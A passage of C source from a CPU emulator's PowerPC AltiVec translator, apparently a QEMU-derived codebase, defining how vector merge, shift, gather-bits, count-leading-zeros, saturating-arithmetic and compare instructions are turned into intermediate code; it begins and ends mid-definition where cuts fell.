MO_32, tcg_gen_gvec_umin, 1, 10); GEN_VXFORM_V(vminud, MO_64, tcg_gen_gvec_umin, 1, 11); GEN_VXFORM_V(vminsb, MO_8, tcg_gen_gvec_smin, 1, 12); GEN_VXFORM_V(vminsh, MO_16, tcg_gen_gvec_smin, 1, 13); GEN_VXFORM_V(vminsw, MO_32, tcg_gen_gvec_smin, 1, 14); GEN_VXFORM_V(vminsd, MO_64, tcg_gen_gvec_smin, 1, 15); GEN_VXFORM(vavgub, 1, 16); GEN_VXFORM(vabsdub, 1, 16); GEN_VXFORM_DUAL(vavgub, PPC_ALTIVEC, PPC_NONE, \ vabsdub, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavguh, 1, 17); GEN_VXFORM(vabsduh, 1, 17); GEN_VXFORM_DUAL(vavguh, PPC_ALTIVEC, PPC_NONE, \ vabsduh, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavguw, 1, 18); GEN_VXFORM(vabsduw, 1, 18); GEN_VXFORM_DUAL(vavguw, PPC_ALTIVEC, PPC_NONE, \ vabsduw, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavgsb, 1, 20); GEN_VXFORM(vavgsh, 1, 21); GEN_VXFORM(vavgsw, 1, 22); GEN_VXFORM(vmrghb, 6, 0); 
GEN_VXFORM(vmrghh, 6, 1); GEN_VXFORM(vmrghw, 6, 2); GEN_VXFORM(vmrglb, 6, 4); GEN_VXFORM(vmrglh, 6, 5); GEN_VXFORM(vmrglw, 6, 6); static void trans_vmrgew(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); get_avr64(tcg_ctx, avr, VB, true); tcg_gen_shri_i64(tcg_ctx, tmp, avr, 32); get_avr64(tcg_ctx, avr, VA, true); tcg_gen_deposit_i64(tcg_ctx, avr, avr, tmp, 0, 32); set_avr64(tcg_ctx, VT, avr, true); get_avr64(tcg_ctx, avr, VB, false); tcg_gen_shri_i64(tcg_ctx, tmp, avr, 32); get_avr64(tcg_ctx, avr, VA, false); tcg_gen_deposit_i64(tcg_ctx, avr, avr, tmp, 0, 32); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, avr); } static void trans_vmrgow(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); get_avr64(tcg_ctx, t0, VB, true); get_avr64(tcg_ctx, t1, VA, true); tcg_gen_deposit_i64(tcg_ctx, avr, t0, t1, 32, 32); set_avr64(tcg_ctx, VT, avr, true); get_avr64(tcg_ctx, t0, VB, false); get_avr64(tcg_ctx, t1, VA, false); tcg_gen_deposit_i64(tcg_ctx, avr, t0, t1, 32, 32); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, avr); } /* * lvsl VRT,RA,RB - Load Vector for Shift Left * * Let the EA be the sum (rA|0)+(rB). Let sh=EA[28-31]. * Let X be the 32-byte value 0x00 || 0x01 || 0x02 || ... || 0x1E || 0x1F. * Bytes sh:sh+15 of X are placed into vD. */ static void trans_lvsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv EA = tcg_temp_new(tcg_ctx); /* Get sh(from description) by anding EA with 0xf. */ gen_addr_reg_index(ctx, EA); tcg_gen_extu_tl_i64(tcg_ctx, sh, EA); tcg_gen_andi_i64(tcg_ctx, sh, sh, 0xfULL); /* * Create bytes sh:sh+7 of X(from description) and place them in * higher doubleword of vD. */ tcg_gen_muli_i64(tcg_ctx, sh, sh, 0x0101010101010101ULL); tcg_gen_addi_i64(tcg_ctx, result, sh, 0x0001020304050607ull); set_avr64(tcg_ctx, VT, result, true); /* * Create bytes sh+8:sh+15 of X(from description) and place them in * lower doubleword of vD. */ tcg_gen_addi_i64(tcg_ctx, result, sh, 0x08090a0b0c0d0e0fULL); set_avr64(tcg_ctx, VT, result, false); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free(tcg_ctx, EA); } /* * lvsr VRT,RA,RB - Load Vector for Shift Right * * Let the EA be the sum (rA|0)+(rB). Let sh=EA[28-31]. * Let X be the 32-byte value 0x00 || 0x01 || 0x02 || ... || 0x1E || 0x1F. * Bytes (16-sh):(31-sh) of X are placed into vD. */ static void trans_lvsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv EA = tcg_temp_new(tcg_ctx); /* Get sh(from description) by anding EA with 0xf. */ gen_addr_reg_index(ctx, EA); tcg_gen_extu_tl_i64(tcg_ctx, sh, EA); tcg_gen_andi_i64(tcg_ctx, sh, sh, 0xfULL); /* * Create bytes (16-sh):(23-sh) of X(from description) and place them in * higher doubleword of vD. 
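 * With sh replicated into every byte by the multiply below, a single
 * subtraction from 0x1011121314151617 produces bytes (16-sh):(23-sh) at once.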
*/ tcg_gen_muli_i64(tcg_ctx, sh, sh, 0x0101010101010101ULL); tcg_gen_subfi_i64(tcg_ctx, result, 0x1011121314151617ULL, sh); set_avr64(tcg_ctx, VT, result, true); /* * Create bytes (24-sh):(32-sh) of X(from description) and place them in * lower doubleword of vD. */ tcg_gen_subfi_i64(tcg_ctx, result, 0x18191a1b1c1d1e1fULL, sh); set_avr64(tcg_ctx, VT, result, false); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free(tcg_ctx, EA); } /* * vsl VRT,VRA,VRB - Vector Shift Left * * Shifting left 128 bit value of vA by value specified in bits 125-127 of vB. * Lowest 3 bits in each byte element of register vB must be identical or * result is undefined. */ static void trans_vsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 carry = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Place bits 125-127 of vB in 'sh'. */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_andi_i64(tcg_ctx, sh, avr, 0x07ULL); /* * Save highest 'sh' bits of lower doubleword element of vA in variable * 'carry' and perform shift on lower doubleword. */ get_avr64(tcg_ctx, avr, VA, false); tcg_gen_subfi_i64(tcg_ctx, tmp, 32, sh); tcg_gen_shri_i64(tcg_ctx, carry, avr, 32); tcg_gen_shr_i64(tcg_ctx, carry, carry, tmp); tcg_gen_shl_i64(tcg_ctx, avr, avr, sh); set_avr64(tcg_ctx, VT, avr, false); /* * Perform shift on higher doubleword element of vA and replace lowest * 'sh' bits with 'carry'. */ get_avr64(tcg_ctx, avr, VA, true); tcg_gen_shl_i64(tcg_ctx, avr, avr, sh); tcg_gen_or_i64(tcg_ctx, avr, avr, carry); set_avr64(tcg_ctx, VT, avr, true); tcg_temp_free_i64(tcg_ctx, avr); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free_i64(tcg_ctx, carry); tcg_temp_free_i64(tcg_ctx, tmp); } /* * vsr VRT,VRA,VRB - Vector Shift Right * * Shifting right 128 bit value of vA by value specified in bits 125-127 of vB. * Lowest 3 bits in each byte element of register vB must be identical or * result is undefined. */ static void trans_vsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 carry = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Place bits 125-127 of vB in 'sh'. */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_andi_i64(tcg_ctx, sh, avr, 0x07ULL); /* * Save lowest 'sh' bits of higher doubleword element of vA in variable * 'carry' and perform shift on higher doubleword. */ get_avr64(tcg_ctx, avr, VA, true); tcg_gen_subfi_i64(tcg_ctx, tmp, 32, sh); tcg_gen_shli_i64(tcg_ctx, carry, avr, 32); tcg_gen_shl_i64(tcg_ctx, carry, carry, tmp); tcg_gen_shr_i64(tcg_ctx, avr, avr, sh); set_avr64(tcg_ctx, VT, avr, true); /* * Perform shift on lower doubleword element of vA and replace highest * 'sh' bits with 'carry'. 
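 * ('carry' holds the bits shifted out of the higher doubleword, already
 * positioned at the top by the shl pair above.)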
     */
    get_avr64(tcg_ctx, avr, VA, false);
    tcg_gen_shr_i64(tcg_ctx, avr, avr, sh);
    tcg_gen_or_i64(tcg_ctx, avr, avr, carry);
    set_avr64(tcg_ctx, VT, avr, false);

    tcg_temp_free_i64(tcg_ctx, avr);
    tcg_temp_free_i64(tcg_ctx, sh);
    tcg_temp_free_i64(tcg_ctx, carry);
    tcg_temp_free_i64(tcg_ctx, tmp);
}

/*
 * vgbbd VRT,VRB - Vector Gather Bits by Bytes by Doubleword
 *
 * All ith bits (i in range 1 to 8) of each byte of a doubleword element in
 * the source register are concatenated and placed into the ith byte of the
 * corresponding doubleword element in the destination register.
 *
 * The solution below handles both doubleword elements of the source register
 * in parallel, in order to reduce the number of instructions needed (which is
 * why arrays are used):
 * First, both doubleword elements of source register vB are placed in the
 * corresponding elements of array avr. Bits are gathered in 2x8 iterations
 * (two for loops). In the first iteration bit 1 of byte 1, bit 2 of byte 2,
 * ... bit 8 of byte 8 are already in their final spots, so avr[i], i={0,1},
 * can be and-ed with tcg_mask directly. For every following iteration, avr[i]
 * and tcg_mask have to be shifted right by 7 and 8 places, respectively, so
 * that bit 1 of byte 2, bit 2 of byte 3, ... bit 7 of byte 8 land in their
 * final spots and the shifted avr values (saved in tmp) can be and-ed with
 * the new value of tcg_mask. After the first 8 iterations (the first loop),
 * all the first bits are in their final places, all the second bits except
 * the one from the eighth byte are in theirs, and so on; of the eighth bits,
 * only the one from the eighth byte is in its place. The second loop performs
 * the same operations symmetrically (shifting left) in order to get the other
 * half of the bits into their final spots. The results for the first and
 * second doubleword elements are accumulated in result[0] and result[1]
 * respectively, and are finally written to the corresponding doubleword
 * elements of destination register vD.
 */
static void trans_vgbbd(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    int VT = rD(ctx->opcode);
    int VB = rB(ctx->opcode);
    TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx);
    uint64_t mask = 0x8040201008040201ULL;
    int i, j;

    TCGv_i64 result[2];
    result[0] = tcg_temp_new_i64(tcg_ctx);
    result[1] = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 avr[2];
    avr[0] = tcg_temp_new_i64(tcg_ctx);
    avr[1] = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 tcg_mask = tcg_temp_new_i64(tcg_ctx);

    tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask);
    for (j = 0; j < 2; j++) {
        get_avr64(tcg_ctx, avr[j], VB, j);
        tcg_gen_and_i64(tcg_ctx, result[j], avr[j], tcg_mask);
    }
    for (i = 1; i < 8; i++) {
        tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask >> (i * 8));
        for (j = 0; j < 2; j++) {
            tcg_gen_shri_i64(tcg_ctx, tmp, avr[j], i * 7);
            tcg_gen_and_i64(tcg_ctx, tmp, tmp, tcg_mask);
            tcg_gen_or_i64(tcg_ctx, result[j], result[j], tmp);
        }
    }
    for (i = 1; i < 8; i++) {
        tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask << (i * 8));
        for (j = 0; j < 2; j++) {
            tcg_gen_shli_i64(tcg_ctx, tmp, avr[j], i * 7);
            tcg_gen_and_i64(tcg_ctx, tmp, tmp, tcg_mask);
            tcg_gen_or_i64(tcg_ctx, result[j], result[j], tmp);
        }
    }
    for (j = 0; j < 2; j++) {
        set_avr64(tcg_ctx, VT, result[j], j);
    }

    tcg_temp_free_i64(tcg_ctx, tmp);
    tcg_temp_free_i64(tcg_ctx, tcg_mask);
    tcg_temp_free_i64(tcg_ctx, result[0]);
    tcg_temp_free_i64(tcg_ctx, result[1]);
    tcg_temp_free_i64(tcg_ctx, avr[0]);
    tcg_temp_free_i64(tcg_ctx, avr[1]);
}

/*
 * vclzw VRT,VRB - Vector Count Leading Zeros Word
 *
 * Counting the number of leading zero bits of each word element in the
 * source register and placing the result in the appropriate word element
 * of the destination register.
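 * A zero word yields 32, the fallback value passed to tcg_gen_clzi_i32 below.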
*/ static void trans_vclzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); int i; /* Perform count for every word element using tcg_gen_clzi_i32. */ for (i = 0; i < 4; i++) { tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[32 + VB].u64[0]) + i * 4); tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[32 + VT].u64[0]) + i * 4); } tcg_temp_free_i32(tcg_ctx, tmp); } /* * vclzd VRT,VRB - Vector Count Leading Zeros Doubleword * * Counting the number of leading zero bits of each doubleword element in source * register and placing result in appropriate doubleword element of destination * register. */ static void trans_vclzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); /* high doubleword */ get_avr64(tcg_ctx, avr, VB, true); tcg_gen_clzi_i64(tcg_ctx, avr, avr, 64); set_avr64(tcg_ctx, VT, avr, true); /* low doubleword */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_clzi_i64(tcg_ctx, avr, avr, 64); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, avr); } GEN_VXFORM(vmuloub, 4, 0); GEN_VXFORM(vmulouh, 4, 1); GEN_VXFORM(vmulouw, 4, 2); GEN_VXFORM(vmuluwm, 4, 2); GEN_VXFORM_DUAL(vmulouw, PPC_ALTIVEC, PPC_NONE, vmuluwm, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vmulosb, 4, 4); GEN_VXFORM(vmulosh, 4, 5); GEN_VXFORM(vmulosw, 4, 6); GEN_VXFORM(vmuleub, 4, 8); GEN_VXFORM(vmuleuh, 4, 9); GEN_VXFORM(vmuleuw, 4, 10); GEN_VXFORM(vmulesb, 4, 12); GEN_VXFORM(vmulesh, 4, 13); GEN_VXFORM(vmulesw, 4, 14); GEN_VXFORM_V(vslb, MO_8, tcg_gen_gvec_shlv, 2, 4); GEN_VXFORM_V(vslh, MO_16, tcg_gen_gvec_shlv, 2, 5); GEN_VXFORM_V(vslw, MO_32, tcg_gen_gvec_shlv, 2, 6); GEN_VXFORM(vrlwnm, 2, 6); GEN_VXFORM_DUAL(vslw, PPC_ALTIVEC, PPC_NONE, \ vrlwnm, PPC_NONE, PPC2_ISA300) GEN_VXFORM_V(vsld, MO_64, tcg_gen_gvec_shlv, 2, 23); GEN_VXFORM_V(vsrb, MO_8, tcg_gen_gvec_shrv, 2, 8); GEN_VXFORM_V(vsrh, MO_16, tcg_gen_gvec_shrv, 2, 9); GEN_VXFORM_V(vsrw, MO_32, tcg_gen_gvec_shrv, 2, 10); GEN_VXFORM_V(vsrd, MO_64, tcg_gen_gvec_shrv, 2, 27); GEN_VXFORM_V(vsrab, MO_8, tcg_gen_gvec_sarv, 2, 12); GEN_VXFORM_V(vsrah, MO_16, tcg_gen_gvec_sarv, 2, 13); GEN_VXFORM_V(vsraw, MO_32, tcg_gen_gvec_sarv, 2, 14); GEN_VXFORM_V(vsrad, MO_64, tcg_gen_gvec_sarv, 2, 15); GEN_VXFORM(vsrv, 2, 28); GEN_VXFORM(vslv, 2, 29); GEN_VXFORM(vslo, 6, 16); GEN_VXFORM(vsro, 6, 17); GEN_VXFORM(vaddcuw, 0, 6); GEN_VXFORM(vsubcuw, 0, 22); #define GEN_VXFORM_SAT(NAME, VECE, NORM, SAT, OPC2, OPC3) \ static void glue(glue(gen_, NAME), _vec)(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, \ TCGv_vec sat, TCGv_vec a, \ TCGv_vec b) \ { \ TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); \ glue(glue(tcg_gen_, NORM), _vec)(tcg_ctx, VECE, x, a, b); \ glue(glue(tcg_gen_, SAT), _vec)(tcg_ctx, VECE, t, a, b); \ tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, VECE, x, x, t); \ tcg_gen_or_vec(tcg_ctx, VECE, sat, sat, x); \ tcg_temp_free_vec(tcg_ctx, x); \ } \ static void glue(gen_, NAME)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ static const TCGOpcode vecop_list[] = { \ glue(glue(INDEX_op_, NORM), _vec), \ glue(glue(INDEX_op_, SAT), _vec), \ INDEX_op_cmp_vec, 0 \ }; \ static const GVecGen4 g = { \ .fniv = glue(glue(gen_, NAME), _vec), \ .fno = glue(gen_helper_, NAME), \ .opt_opc = vecop_list, \ .write_aofs = true, \ .vece = VECE, \ }; \ if 
(unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ tcg_gen_gvec_4(tcg_ctx, avr_full_offset(rD(ctx->opcode)), \ offsetof(CPUPPCState, vscr_sat), \ avr_full_offset(rA(ctx->opcode)), \ avr_full_offset(rB(ctx->opcode)), \ 16, 16, &g); \ } GEN_VXFORM_SAT(vaddubs, MO_8, add, usadd, 0, 8); GEN_VXFORM_DUAL_EXT(vaddubs, PPC_ALTIVEC, PPC_NONE, 0, \ vmul10uq, PPC_NONE, PPC2_ISA300, 0x0000F800) GEN_VXFORM_SAT(vadduhs, MO_16, add, usadd, 0, 9); GEN_VXFORM_DUAL(vadduhs, PPC_ALTIVEC, PPC_NONE, \ vmul10euq, PPC_NONE, PPC2_ISA300) GEN_VXFORM_SAT(vadduws, MO_32, add, usadd, 0, 10); GEN_VXFORM_SAT(vaddsbs, MO_8, add, ssadd, 0, 12); GEN_VXFORM_SAT(vaddshs, MO_16, add, ssadd, 0, 13); GEN_VXFORM_SAT(vaddsws, MO_32, add, ssadd, 0, 14); GEN_VXFORM_SAT(vsububs, MO_8, sub, ussub, 0, 24); GEN_VXFORM_SAT(vsubuhs, MO_16, sub, ussub, 0, 25); GEN_VXFORM_SAT(vsubuws, MO_32, sub, ussub, 0, 26); GEN_VXFORM_SAT(vsubsbs, MO_8, sub, sssub, 0, 28); GEN_VXFORM_SAT(vsubshs, MO_16, sub, sssub, 0, 29); GEN_VXFORM_SAT(vsubsws, MO_32, sub, sssub, 0, 30); GEN_VXFORM(vadduqm, 0, 4); GEN_VXFORM(vaddcuq, 0, 5); GEN_VXFORM3(vaddeuqm, 30, 0); GEN_VXFORM3(vaddecuq, 30, 0); GEN_VXFORM_DUAL(vaddeuqm, PPC_NONE, PPC2_ALTIVEC_207, \ vaddecuq, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vsubuqm, 0, 20); GEN_VXFORM(vsubcuq, 0, 21); GEN_VXFORM3(vsubeuqm, 31, 0); GEN_VXFORM3(vsubecuq, 31, 0); GEN_VXFORM_DUAL(vsubeuqm, PPC_NONE, PPC2_ALTIVEC_207, \ vsubecuq, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vrlb, 2, 0); GEN_VXFORM(vrlh, 2, 1); GEN_VXFORM(vrlw, 2, 2); GEN_VXFORM(vrlwmi, 2, 2); GEN_VXFORM_DUAL(vrlw, PPC_ALTIVEC, PPC_NONE, \ vrlwmi, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vrld, 2, 3); GEN_VXFORM(vrldmi, 2, 3); GEN_VXFORM_DUAL(vrld, PPC_NONE, PPC2_ALTIVEC_207, \ vrldmi, PPC_NONE, PPC2_ISA300) GEN_VXFORM_TRANS(vsl, 2, 7); GEN_VXFORM(vrldnm, 2, 7); GEN_VXFORM_DUAL(vsl, PPC_ALTIVEC, PPC_NONE, \ vrldnm, PPC_NONE, PPC2_ISA300) GEN_VXFORM_TRANS(vsr, 2, 11); GEN_VXFORM_ENV(vpkuhum, 7, 0); GEN_VXFORM_ENV(vpkuwum, 7, 1); GEN_VXFORM_ENV(vpkudum, 7, 17); GEN_VXFORM_ENV(vpkuhus, 7, 2); GEN_VXFORM_ENV(vpkuwus, 7, 3); GEN_VXFORM_ENV(vpkudus, 7, 19); GEN_VXFORM_ENV(vpkshus, 7, 4); GEN_VXFORM_ENV(vpkswus, 7, 5); GEN_VXFORM_ENV(vpksdus, 7, 21); GEN_VXFORM_ENV(vpkshss, 7, 6); GEN_VXFORM_ENV(vpkswss, 7, 7); GEN_VXFORM_ENV(vpksdss, 7, 23); GEN_VXFORM(vpkpx, 7, 12); GEN_VXFORM_ENV(vsum4ubs, 4, 24); GEN_VXFORM_ENV(vsum4sbs, 4, 28); GEN_VXFORM_ENV(vsum4shs, 4, 25); GEN_VXFORM_ENV(vsum2sws, 4, 26); GEN_VXFORM_ENV(vsumsws, 4, 30); GEN_VXFORM_ENV(vaddfp, 5, 0); GEN_VXFORM_ENV(vsubfp, 5, 1); GEN_VXFORM_ENV(vmaxfp, 5, 16); GEN_VXFORM_ENV(vminfp, 5, 17); GEN_VXFORM_HETRO(vextublx, 6, 24) GEN_VXFORM_HETRO(vextuhlx, 6, 25) GEN_VXFORM_HETRO(vextuwlx, 6, 26) GEN_VXFORM_TRANS_DUAL(vmrgow, PPC_NONE, PPC2_ALTIVEC_207, vextuwlx, PPC_NONE, PPC2_ISA300) GEN_VXFORM_HETRO(vextubrx, 6, 28) GEN_VXFORM_HETRO(vextuhrx, 6, 29) GEN_VXFORM_HETRO(vextuwrx, 6, 30) GEN_VXFORM_TRANS(lvsl, 6, 31) GEN_VXFORM_TRANS(lvsr, 6, 32) GEN_VXFORM_TRANS_DUAL(vmrgew, PPC_NONE, PPC2_ALTIVEC_207, vextuwrx, PPC_NONE, PPC2_ISA300) #define GEN_VXRFORM1(opname, name, str, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##opname(tcg_ctx, tcg_ctx->cpu_env, rd, ra, 
rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXRFORM(name, opc2, opc3) \ GEN_VXRFORM1(name, name, #name, opc2, opc3) \ GEN_VXRFORM1(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) /* * Support for Altivec instructions that use bit 31 (Rc) as an opcode * bit but also use bit 21 as an actual Rc bit. In general, these pairs * come from different versions of the ISA, so we must also support a * pair of flags for each instruction. */ #define GEN_VXRFORM_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \ if (Rc21(ctx->opcode) == 0) { \ gen_##name0(ctx); \ } else { \ gen_##name0##_(ctx); \ } \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \ if (Rc21(ctx->opcode) == 0) { \ gen_##name1(ctx); \ } else { \ gen_##name1##_(ctx); \ } \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } GEN_VXRFORM(vcmpequb, 3, 0) GEN_VXRFORM(vcmpequh, 3, 1) GEN_VXRFORM(vcmpequw, 3, 2) GEN_VXRFORM(vcmpequd, 3, 3) GEN_VXRFORM(vcmpnezb, 3, 4) GEN_VXRFORM(vcmpnezh, 3, 5) GEN_VXRFORM(vcmpnezw, 3, 6) GEN_VXRFORM(vcmpgtsb, 3, 12) GEN_VXRFORM(vcmpgtsh, 3, 13) GEN_VXRFORM(vcmpgtsw, 3, 14) GEN_VXRFORM(vcmpgtsd, 3, 15) GEN_VXRFORM(vcmpgtub, 3, 8) GEN_VXRFORM(vcmpgtuh, 3, 9) GEN_VXRFORM(vcmpgtuw, 3, 10) GEN_VXRFORM(vcmpgtud, 3, 11) GEN_VXRFORM(vcmpeqfp, 3, 3) GEN_VXRFORM(vcmpgefp, 3, 7) GEN_VXRFORM(vcmpgtfp, 3, 11) GEN_VXRFORM(vcmpbfp, 3, 15) GEN_VXRFORM(vcmpneb, 3, 0) GEN_VXRFORM(vcmpneh, 3, 1) GEN_VXRFORM(vcmpnew, 3, 2) GEN_VXRFORM_DUAL(vcmpequb, PPC_ALTIVEC, PPC_NONE, \ vcmpneb, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpequh, PPC_ALTIVEC, PPC_NONE, \ vcmpneh, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpequw, PPC_ALTIVEC, PPC_NONE, \ vcmpnew, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpeqfp, PPC_ALTIVEC, PPC_NONE, \ vcmpequd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXRFORM_DUAL(vcmpbfp, PPC_ALTIVEC, PPC_NONE, \ vcmpgtsd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXRFORM_DUAL(vcmpgtfp, PPC_ALTIVEC, PPC_NONE, \ vcmpgtud, PPC_NONE, PPC2_ALTIVEC_207) #define GEN_VXFORM_DUPI(name, tcg_op, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int simm; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ simm = SIMM5(ctx->opcode); \ tcg_op(tcg_ctx, avr_full_offset(rD(ctx->opcode)), 16, 16, simm);\ } GEN_VXFORM_DUPI(vspltisb, tcg_gen_gvec_dup8i, 6, 12); GEN_VXFORM_DUPI(vspltish, tcg_gen_gvec_dup16i, 6, 13); GEN_VXFORM_DUPI(vspltisw, tcg_gen_gvec_dup32i, 6, 14); #define GEN_VXFORM_NOA(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_ENV(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, 
rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_2(name, opc2, opc3, opc4) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_3(name, opc2, opc3, opc4) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr 